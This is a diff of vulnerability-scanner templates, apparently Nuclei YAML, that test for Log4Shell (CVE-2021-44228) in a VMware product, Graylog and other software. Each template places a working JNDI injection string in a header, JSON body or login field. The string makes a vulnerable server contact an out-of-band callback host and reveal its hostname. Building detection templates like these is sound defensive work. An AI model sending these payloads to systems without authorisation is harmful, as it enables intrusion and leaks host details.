||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -35,7 +39,7 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
|
@ -47,8 +51,14 @@ http:
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
|
@ -20,12 +20,16 @@ info:
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
max-request: 1
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
GET / HTTP/1.1
|
GET / HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
X-Api-Version: ${jndi:ldap://${hostName}.{{interactsh-url}}}
|
X-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -37,17 +41,23 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: kval
|
- type: kval
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by mp on 2022/05/31
|
# Enhanced by mp on 2022/05/31
|
||||||
|
|
|
@ -20,6 +20,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast
|
tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -32,7 +36,7 @@ http:
|
||||||
|
|
||||||
{
|
{
|
||||||
"authType": "password",
|
"authType": "password",
|
||||||
"username": "${jndi:ldap://${sys:os.name}.{{interactsh-url}}}",
|
"username": "${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}",
|
||||||
"password": "admin"
|
"password": "admin"
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -46,16 +50,23 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: kval
|
- type: kval
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by md on 2022/10/05
|
# Enhanced by md on 2022/10/05
|
||||||
|
|
|
@ -20,6 +20,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast
|
tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -30,7 +34,7 @@ http:
|
||||||
Origin: {{BaseURL}}
|
Origin: {{BaseURL}}
|
||||||
Referer: {{BaseURL}}/login.jsp
|
Referer: {{BaseURL}}/login.jsp
|
||||||
|
|
||||||
username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&submit=
|
username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&password=admin&submit=
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -42,7 +46,7 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: location
|
part: location
|
||||||
|
@ -54,8 +58,14 @@ http:
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
|
@ -20,6 +20,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast
|
tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -33,7 +37,7 @@ http:
|
||||||
Sec-Fetch-Mode: cors
|
Sec-Fetch-Mode: cors
|
||||||
Sec-Fetch-Site: same-origin
|
Sec-Fetch-Site: same-origin
|
||||||
|
|
||||||
mainAction=login&userName=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&authSourceId=localItem&authSourceName=Local%20Users&authSourceType=LOCAL&forceLogin=&timezone=330&languageCode=us
|
mainAction=login&userName=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&password=admin&authSourceId=localItem&authSourceName=Local%20Users&authSourceType=LOCAL&forceLogin=&timezone=330&languageCode=us
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -45,7 +49,7 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
part: header
|
||||||
|
@ -57,8 +61,14 @@ http:
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
|
@ -23,6 +23,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,oast,rce,log4j,vmware,vrealize,kev
|
tags: cve,cve2021,oast,rce,log4j,vmware,vrealize,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -32,7 +36,7 @@ http:
|
||||||
Origin: {{RootURL}}
|
Origin: {{RootURL}}
|
||||||
Referer: {{RootURL}}/ui/
|
Referer: {{RootURL}}/ui/
|
||||||
|
|
||||||
{"username":"${jndi:ldap://${hostName}.{{interactsh-url}}}","password":"admin"}
|
{"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}","password":"admin"}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -44,13 +48,23 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
kval:
|
||||||
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by mp on 2022/04/05
|
# Enhanced by mp on 2022/04/05
|
||||||
|
|